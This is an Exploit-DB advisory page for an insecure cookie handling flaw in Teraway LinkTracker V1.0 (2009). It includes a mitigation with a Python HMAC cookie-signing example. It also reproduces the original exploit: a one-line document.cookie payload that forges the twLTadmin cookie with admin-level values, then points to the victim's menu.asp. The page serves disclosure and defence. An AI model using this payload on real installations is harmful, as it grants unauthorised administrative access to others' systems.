Vendor: LinkTracker
By: milw0rm.com
CVSS: 7.5 (HIGH)
Vulnerability: Insecure Cookie Handling
CWE: 614
Product Name: LinkTracker
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:teraway:linktracker:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln

The application trusts the client-supplied 'twLTadmin' cookie, which carries the user ID (userid) and the user's level (lvl), without validating it. An attacker can exploit this by setting the cookie manually and then accessing the menu.asp page with the privileges of the user named in the cookie.

Mitigation:

The application should validate the cookie before using it.
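
One way to do that validation, shown as an added example (not code from the original advisory or from the vendor): the server appends an HMAC to the cookie at login and rejects any value whose MAC does not verify. The function names, the `sig` field and the key are assumptions made for the illustration; only the `twLTadmin` field layout (`userid`, `lvl`) comes from the page.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Assumption: a server-side secret that never leaves the server (constructed value).
SECRET_KEY = b"example-only-secret-rotate-in-production"


def _sign(payload: str) -> bytes:
    """HMAC-SHA256 over the cookie fields, hex-encoded."""
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest().encode()


def parse_unvalidated(cookie_value: str) -> dict:
    """Behaviour described on the page: the fields are trusted exactly as sent."""
    fields = parse_qs(cookie_value)
    return {"userid": fields["userid"][0], "lvl": fields["lvl"][0]}


def issue_cookie(userid: int, lvl: int) -> str:
    """Called only after a successful login; appends a MAC over the fields."""
    payload = f"userid={userid}&lvl={lvl}"
    return f"{payload}&sig={_sign(payload).decode()}"


def verify_cookie(cookie_value: str):
    """Return the fields only if the MAC matches; otherwise return None."""
    payload, sep, sig = cookie_value.rpartition("&sig=")
    # Missing signature, or one that does not match the fields: reject.
    if not sep or not hmac.compare_digest(_sign(payload), sig.encode()):
        return None
    fields = parse_qs(payload)
    return {"userid": fields["userid"][0], "lvl": fields["lvl"][0]}


if __name__ == "__main__":
    hand_set = "userid=1&lvl=1"                 # value a client can set itself
    print(parse_unvalidated(hand_set))          # accepted as-is
    print(verify_cookie(hand_set))              # None: no valid MAC
    print(verify_cookie(issue_cookie(7, 3)))    # fields issued by the server
```

A MAC only proves the server issued the value; expiry and revocation still need a timestamp in the signed payload or a server-side session record.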

Exploit-DB raw data:

-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway LinkTracker V1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: The possible asked the impossible, "Where do you live?" It answered, "In the dreams of the powerless."
-------------------------------------
Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twLTadmin=userid=1&lvl=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/linktracker/demo/login.asp


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
And ALL Members Of anti-intruders.org  
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-27]